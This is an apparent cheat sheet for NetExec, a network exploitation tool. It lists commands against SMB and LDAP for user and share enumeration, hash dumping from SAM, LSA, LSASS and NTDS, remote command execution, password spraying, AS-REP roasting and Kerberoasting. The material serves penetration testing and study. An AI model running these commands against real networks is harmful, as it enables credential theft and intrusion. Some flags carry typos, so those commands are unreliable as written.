NetExec
About
NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks. Usable for multiple protocols, such as smb, ssh, ldap, ftp, wmi, winrm, rdp, vnc, mssql, and nfs.
Links
Usage
Logging
nxc PROTOCOL IP -u 'USER' -p 'PASSWORD' --log
SMB
General host info
nxc smb targets.txt
Enumerate Users
nxc smb IP -u USER -p 'PASSWORD' --users
nxc smb IP -u USER -p 'PASSWORD' --users-export users.txt
See what AV/EDR is running
nxc smb IP -u USER -p 'PASSWORD' -M enum_av
Generate a list of relayable hosts (SMB Signing disabled)
nxc smb up-hosts.txt --gen-relay-list relay.txt
Enumerate shares
nxc smb ip -u 'USER' -p 'PASSWORD' --shares
Dumping hashes
nxc smb IP -u username -p password --sam
nxc smb IP -u username -p password --1sa
nxc smb IP -u username -p password -M lsassy
nxc smb IP -u username -p password --dpapi
nxc smb IP -u username -p password --ntds
nxc smb IP -u username -p password —-ntds —user Administrator
Pass cmd
nxc smb ip -u 'USER' -p <passwordt> -x 'command'
Pass powershell
nxc smb ip -u 'USER' -p 'PASSWORD' -X 'command'
Look at domain admins
nxc smb ip -u 'USER' -p 'PASSWORD' -x 'net group "Domain Admins" /domain'
Look at logged on users
nxc smb ip -u 'USER' -p 'PASSWORD' --loggedon-users
View password policy
nxc smb dc-ip -u 'USER' -p 'password' --pass-pol
Enumerate SMB Shares testing for anonymous access
nxc smb targets.txt --shares --no-bruteforce
Perform a password spray
nxc smb IP -u users.txt -p 'Password123!' --continue-on-success
nxc smb IP -u users.txt -p passwords. txt --continue-on-success
nxc smb IP -u userl user2 user3 -p Summer18
nxc smb IP -u userl -p passwordl password2 password3
nxc smb IP -u user.txt -p user.txt —no-bruteforce --continue-on-success
nxc smb IP -u user.txt -p password.txt —-no-bruteforce —-continue-on-success
nxc smb IP -u user.txt -p password.txt —-no-bruteforce —-continue-on-success -d DELAY-#-IN-MINUTES
LDAP
Check for misconfigured Delegation
nxc ldap IP -u username -p password --find-delegation
Machine Account Quota - Created rogue machine account for escalation
nxc ldap IP -u username -p password -M maq
Enumerate Users/Groups
nxc ldap IP -u username -p password --users
nxc ldap IP -u username -p password --active-users
nxc ldap IP -u username -p password --groups
nxc ldap IP -u username -p password --groups 'Domain Admins'
Test if an Account Exists without Kerberos. When using the option -k
or –use-kcache
, you need to specify the same hostname (FQDN) as the one from the kerberos ticket
nxc ldap <ldap-server> -u "'USER'.txt" -p '' -k
Test credentials
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD'
With valid creds, Enumerate users
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' –-users
ASREPRoasting exploits accounts that do not require Kerberos pre-authentication to extract service ticket hashes, which can then be cracked offline.
nxc ldap <ldap-server> -u 'USER' -p '' --asreproast <output.txt>
With a list of users
nxc ldap <ldap-server> -u users.txt -p '' --asreproast output.txt
Kerberoasting extracts service account hashes by requesting service tickets for accounts with SPNs (Service Principal Names).
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' --kerberoasting hash.txt
BloodHound ingestor is used to collect data for use in BloodHound, a tool for mapping AD attack paths.
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' --bloodhound --collection All --dns-server <ldap-server>
Last updated